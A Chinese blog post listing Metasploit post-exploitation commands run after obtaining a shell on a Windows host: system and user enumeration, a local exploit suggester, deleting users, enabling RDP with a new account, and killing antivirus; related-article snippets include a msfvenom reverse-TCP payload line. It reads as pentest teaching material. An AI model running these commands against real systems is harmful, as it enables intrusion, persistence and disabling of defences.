Metasploit -- 后渗透模块(POST)

最新推荐文章于 2024-03-23 23:32:27 发布
最新推荐文章于 2024-03-23 23:32:27 发布
阅读量935 收藏 4
点赞数 1
分类专栏: web安全工具库 文章标签: Metasploit 后渗透模块
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/114269706
版权

​给时间一点时间,让过去过去,让开始开始。。。

----  网易云热评

作用:获取目标主机后shell后,继续信息收集,提权

1、获取目标分区情况

run post/windows/gather/forensics/enum_drives

2、检测是否是虚拟主机

run post/windows/gather/checkvm

3、获取当前安装的应用程序

run post/windows/gather/enum_applications

4、获取用户登录信息

run post/windows/gather/enum_logged_on_users

5、对目标进行漏洞扫描

run post/multi/recon/local_exploit_suggester

6、收集系统环境信息

run post/multi/gather/env

7、查看开启的服务

run post/windows/gather/enum_services

8、查看目标主机最近的操作

run post/windows/gather/dumplinks

 

9、其他操作

删除用户

run post/wndows/manage/delete_user username=aiyou

添加账户

run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou

关闭杀软

windows/manage/killav

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

web安全工具库
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
渗透流程
weixin_44255856的博客
12-09 927
渗透流程 权限提升 绕过UAC msf模块 Exploit/windows/local/bypassuac Exploit/windows/local/bypassuac_injection Exploit/windows/local/bypassuac_vbs 系统提权 提高程序运行级别 msf模块(Exploit/windows/local/ask) 缺点:需要uac交互 后渗透信...
metasploit-modules:我的metasploit模块
05-23
5. **Post**:后渗透阶段的模块,用于在成功获得目标系统访问权限后执行的任务,如权限提升、数据收集等。 使用Metasploit模块时,通常需要配置模块参数,如目标IP地址、端口、利用选项等,然后运行框架执行模块。...
kali metasploit渗透Post模块
qq_51685718的博客
10-28 405
如果是获取shell后权限是比较低的,post模块中有一个检测目标系统补丁然后会给出相应exp提权的功能。我这由于没安装火狐导致报错。
渗透学习之Metasploitpost模块使用信息收集
来到了学渣的博客
02-22 2831
环境 Kali和win7是nat连接 Kali:192.168.10.145 Win7:192.168.10.143 如果Msf拿shell后出现乱码,输入chcp 65001即可 MSF的post模块 进入msf5 > search post,搜索post模块,发现有471个模块可使用,我挑一部分出来翻译大概看看是用来干嘛的 Linux: Window: 首先得拿一个cmd的s...
渗透攻击
sinat_25635183的博客
03-23 1137
在这个命令中,"upload" 是一个关键词或者命令,后面的 [options] 表示可选的参数,而 src1、src2、src3 则表示要上传的源文件,destination 表示上传的目标位置。实验前提:攻击者利用被攻击的的漏洞,成功进入到了目标机,即在运行了run/exploit命令之后,就开启了一个reverse TCP监听器来监听本地的4444端口,就是攻击者本地的主机地址(LHOST)和端口号(LPORT)。会话受到了用户权限的限制,而这将会严重影响你在目标系统中的活动。
post渗透模块
sweelg的博客
07-16 470
run post/windows/gather/enum_on_users#查看登录过的用户信息 run post/windows/gather/enum_ad_groups #查看组信息 run post/windows/gather/enum_domain #定位域控 run post/windows/gather/enum_ad_computers #域内所有机器 run post/windows/manage/migrate...
Eternalblue-Doublepulsar-Metasploit-master
05-11
Metasploit包含了各种模块,包括exploits(漏洞利用)、payloads(有效载荷)和post-exploitation(后渗透)工具。在这个压缩包中,"master"可能指的是Metasploit的一个分支或更新版本,包含针对永恒之蓝和双脉冲星...
毒蛇:metasploit-framework图形界面图形化内网渗透工具
02-01
2. **整合Cobalt Strike**:Cobalt Strike是另一个高级的红队工具,专注于post-exploitation(后渗透)阶段。Viper可以与Cobalt Strike无缝集成,让用户在图形界面中管理Beacon(Cobalt Strike的代理)。 3. **...
metasploit-framework-6.4.12.zip
最新发布
06-23
- **工作流程**:Metasploit 遵循“侦查-扫描-漏洞利用-持久化-后渗透”等工作流程,覆盖了网络渗透测试的整个生命周期。 2. **6.4.12 版本新特性** - **性能提升**:新版本可能包含代码优化,提高框架运行速度和...
metasploit-termux:一个简单的metasploit安装工具,用于termux
03-14
- Post exploitation:后渗透模块,帮助攻击者在成功入侵后进一步操作目标系统。 - AUXiliary:辅助模块,提供非漏洞利用功能,如扫描、密码破解等。 了解这些基本概念和操作流程,你就可以开始在Termux上使用...
23.通过MS17_010来学习msf对渗透的利用
weixin_30740295的博客
12-20 357
Metersploit 集成了渗透阶段的全部利用,从漏洞探测,到漏洞利用,最后到后渗透阶段。本次博客主要抛砖引玉,通过对MS17_010漏洞的复现,来学习Metasploit。 漏洞环境: 靶机:windows 7 (192.168.0.135) 攻击机:kali 2018 (192.168.0.133) 开始之前先来熟悉 Metaspolit 基本术语: ...
msf之后渗透(笔记)
p_utao的博客
09-14 2435
渗透攻击:信息收集 Metasploit提供了一个强大的后渗透工具——Meterpreter后期渗透模块有200多个。 Meterpreter优势: - 纯内存工作模式,不需要对磁盘进行任何写入操作 - 使用加密通信协议,可以同时与几个信道通信 - 在被攻击进程内工作,不需要创建新的进程 - 易于在多进程之间迁移 - 平台通用 进程迁移 获得shell时,该shell是极其脆弱,所以需要移动这个shell把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作,这样使渗透
Msf后渗透测试阶段_POST模块
分享学习网络的点点滴滴
01-10 283
【代码】Msf后渗透测试阶段_POST模块
渗透测试——后渗透攻击
YT的博客
02-18 6215
Meterpreter 是一个提供了运行时刻可扩展远程 API 调用的攻击载荷模块,后渗透攻击脚本由 Meterpreter 客户端所解释,再远程调用 Meterpreter 服务端 (即运行在目标机上的攻击载荷) 提供的 API 来实现的。 1. persistence 后渗透攻击模块 persistence 帮助信息如下: 输入命令:run persistence -X -i 5 -p 4...
MetasploitPost Exploitation
公众号shadow sock7
06-17 1744
参考: https://www.offensive-security.com/metasploit-unleashed/windows-post-gather-modules/autoroute这个很重要啊! The “autoroute” post module creates a new route through a Meterpreter sessions allowing you to
Metasploit基础和命令的使用
w1304099880的博客
03-19 1311
Metasploit基础Metasploit是什么?渗透测试是干什么的?Metasploit基础命令 Metasploit是什么? Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个
metasploit linux 提权
qq_42307546的博客
04-14 2315
1、简介 Metasploit是一款开源的安全漏洞检测工具,可以帮助`安全和IT专业人士识别安全性问题,验证漏洞的 缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代 码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 生成shell msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=5555 -f elf > shel
渗透攻防工具篇-后渗透阶段的Meterpreter
qdslg的专栏
07-29 4295
文章作者  zusheng 文章来源  i春秋原创奖励计划 时间        2016年8月23日 14:38:43 前言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。目录第一节 初识Meterpreter 1.1、什么是Meterpret...
Web安全攻防-----学习笔记(五)之后渗透攻击:信息渗透
舞指如歌~的博客
09-13 2199
5.5 后渗透攻击:信息收集 Metasploit提供了一个非常强大的后渗透工具------Meterpreter,该工具具有多重功能,后期渗透模块有200多个,Meterpreter有以下优势。 纯内存工作模式,不需要对磁盘进行任何写入操作 使用加密通信协议,而且可以同时与几个信道通信 在被攻击进程内工作,不需要创建新的进程 易于在多进程之间迁移 平台通用,适用于Windows、Li...
metasploit渗透攻击:后门
06-02
2. 利用Metasploitpost模块创建后门,例如使用“post/windows/manage/migrate”模块将后门进程迁移到其他进程中。 3. 确保后门能够在系统启动时自动运行,例如使用“run persistence”命令创建持久化后门。 4. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值